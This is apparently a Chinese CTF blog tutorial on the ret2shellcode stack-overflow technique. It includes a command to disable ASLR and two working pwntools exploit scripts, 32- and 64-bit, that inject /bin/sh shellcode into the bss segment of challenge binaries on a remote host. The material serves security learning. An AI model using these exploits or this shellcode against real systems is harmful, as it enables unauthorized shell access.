Ret2shellcode

pwn

分析原理

控制程序执行shellcode代码。

shellcode代码指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。

是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码

在栈溢出的基础上,要想执行shellcode,需要相应的binary在运行时shellcode所在区域具有可执行权限。

利用

  • 运行时shellcode所在区域具有可执行权限

  • 程序存在溢出,可以控制返回地址

  • 操作系统关闭ASLR (地址空间布局随机化) 保护

    echo 0 > /proc/sys/kernel/randomize_va_space

  • 一般情况下shellcode都写入bss段

解题思路

算出溢出位(cyclic),构造初始paylaod.

使用GDB的vmmap查看bss段权限

将shellcode数据写入到bss段

将程序溢出到上一步用户提交变量的地址

因为写入到bss段之后,关于read函数read(int fd,buf,size_t count) buf就是shellcode写入的bss段地址,也就是我们要溢出到的地址。

例题

ret2sc

​ 查看下源码,发现name变量声明在bss段

​ 按照上面的解题步骤来做,通过cyclic算出溢出位

用vmmap查看bss段权限

可以看到有足够的权限,我们可以将shellcode写入到bss段,使用asm(shellcraft.sh())来生成shellcode,将生成的shellcode写入到name所在的bss段。然后在第二次输入时发送payload将程序溢出到上一个用户变量所在的地址。

exp:

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

#sh = process('./ret2sc')
sh = remote('120.79.17.251',10002)
addr = 0x0804A080

shellcode = asm(shellcraft.sh())
payload = 'a'*60
sh.sendline(shellcode)
sh.sendline(payload+p32(addr))
sh.interactive()

ret2shellcode64

​ 和32位没什么不同,就是最后返回的是64位的地址

exp:

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

#sh = process('./ret2sc_x64')
sh = remote('120.79.17.251', 10003)
addr = 0x0000000000601080
shellcode = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
#shellcode = asm(shellcraft.amd64.linux.sh())
payload = 'a' * 56
sh.sendline(shellcode)
sh.sendline(payload+p64(addr))
sh.interactive()

持续更新

偏有宸机 ret2shellcode在宸机师傅博客学习。宸机师傅—-我pwn生涯的领路人